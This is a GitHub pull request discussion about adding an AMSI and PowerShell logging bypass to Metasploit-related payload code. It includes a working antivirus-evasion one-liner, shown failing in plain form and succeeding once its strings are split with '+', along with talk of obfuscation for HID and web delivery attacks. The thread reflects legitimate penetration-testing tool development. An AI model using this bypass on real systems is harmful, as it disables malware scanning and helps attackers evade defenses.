Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Integrate PowerShell Protections Bypass #17

Merged
merged 5 commits into from Apr 22, 2019

Conversation

@phra
Copy link
Contributor

@phra phra commented Jan 19, 2019

Will fix rapid7/metasploit-framework#11283

@phra phra changed the title Integrate psh protections bypass Integrate PowerShell Protections Bypass Jan 19, 2019
@bwatters-r7
Copy link
Contributor

@bwatters-r7 bwatters-r7 commented Feb 14, 2019

@phra I missed this for a bit, but I'd like to test and land this. Can you give specific examples where our current payloads fail, but this succeeds so we can have some testing benchmarks?

Loading

@phra
Copy link
Contributor Author

@phra phra commented Feb 14, 2019

@bwatters-r7 just try any powershell payloads on an updated win 10 machine with AMSI.

Loading

phra and others added 4 commits Feb 17, 2019
Rex::Powershell has functionality to compose PowerShell code into
Script objects using basic lexical parsing to identify functions,
variables, etc. This functionality is intended to permit/leverage
composition by consumers for maximum entropy. Concurrently, script
modifiers are in place to clean up multiline blocks, replace names,
and perform other obfuscation.

Strip out the built-in uses of the new AMSI and log bypass methods.
Remove textual cleanup to allow Rex to handle this as needed.
Passing the :prepend_protections_bypass to cmd_psh_payload will
prepend the Ruby blocks for AMSI and log bypass to the payload
text. The subsequent compression and encoding passes will perform
the same textual substitution stripping out whitespace and may
also substitute the hardcoded variable names if requested.

This approach keeps string lengths predictable while permitting
use of the evasion functionality. Not so much an issue for a full
PSH payload, but can be handy when dealing with limited space
(HID attacks, manual retyping over GUIs, etc).
@phra
Copy link
Contributor Author

@phra phra commented Apr 15, 2019

Loading

@timwr
Copy link
Contributor

@timwr timwr commented Apr 16, 2019

Very interesting thanks @phra

Loading

@timwr
Copy link
Contributor

@timwr timwr commented Apr 22, 2019

I didn't expect the '+' to work so well:

Microsoft Windows [Version 10.0.17134.523]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\User>powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\User>
>> $Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Stati
c').SetValue($null,$true);
>>
>>
>>
At line:1 char:1
+
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS C:\Users\User> $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');$Ref.GetField('amsiIn'+'itFai
led','NonPublic,Static').SetValue($null,$true);
>>
>>
>>
PS C:\Users\User>
PS C:\Users\User>

Loading

@timwr timwr merged commit 2e14657 into rapid7:master Apr 22, 2019
1 check passed
Loading
@timwr
Copy link
Contributor

@timwr timwr commented Apr 22, 2019

Thanks @phra
We still need to add this to webdelivery (preferably as an off-by-default option).
It would be nice to have the strings obfuscated dynamically, but this will do for now.

Loading

@phra
Copy link
Contributor Author

@phra phra commented Apr 23, 2019

I didn't expect the '+' to work so well:

image

It would be nice to have the strings obfuscated dynamically, but this will do for now.

empire includes https://github.com/danielbohannon/Invoke-Obfuscation but depends on PowerShell and that means adding it as optional? dependency or embedding it directly within the project with a ~50mb overhead of stuff.

writing a simpler, similar project in ruby may be an overkill.

any idea?

Loading

@0xVIC
Copy link

@0xVIC 0xVIC commented Apr 23, 2019

Loading

@phra phra deleted the feat/psh-protections-bypass branch Apr 23, 2019
@phra
Copy link
Contributor Author

@phra phra commented May 1, 2019

was prepend_protections_bypass option defined somewhere?

i don't see the setting available yet with Framework Version: 5.0.19-dev.

Loading

@timwr
Copy link
Contributor

@timwr timwr commented May 10, 2019

@phra apologies I didn't send a PR with that part, I think I tested with this commit: timwr/metasploit-framework@a0d6bcd

Loading

@phra
Copy link
Contributor Author

@phra phra commented May 10, 2019

oh ok, i hope it will be merged into master soon!
regarding the web delivery, it should be enough to prepend the bypass before the delivery script itself when choosing PowerShell as target.

Loading

@phra
Copy link
Contributor Author

@phra phra commented Jul 21, 2019

any update? i still cannot easily add the amsi bypass to powershell payloads.

Loading

@phra
Copy link
Contributor Author

@phra phra commented Oct 10, 2019

@timwr any update on this?

Loading

@timwr
Copy link
Contributor

@timwr timwr commented Oct 11, 2019

@phra did you test the commit I posted above? timwr/metasploit-framework@a0d6bcd
maybe you can send a PR to the framework repository that enables it for web_delivery?

Loading

phra added a commit to phra/metasploit-framework that referenced this issue Oct 12, 2019
phra added a commit to phra/metasploit-framework that referenced this issue Oct 12, 2019
@phra
Copy link
Contributor Author

@phra phra commented Oct 12, 2019

maybe you can send a PR to the framework repository that enables it for web_delivery?

@timwr see rapid7/metasploit-framework#12446

Loading

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

4 participants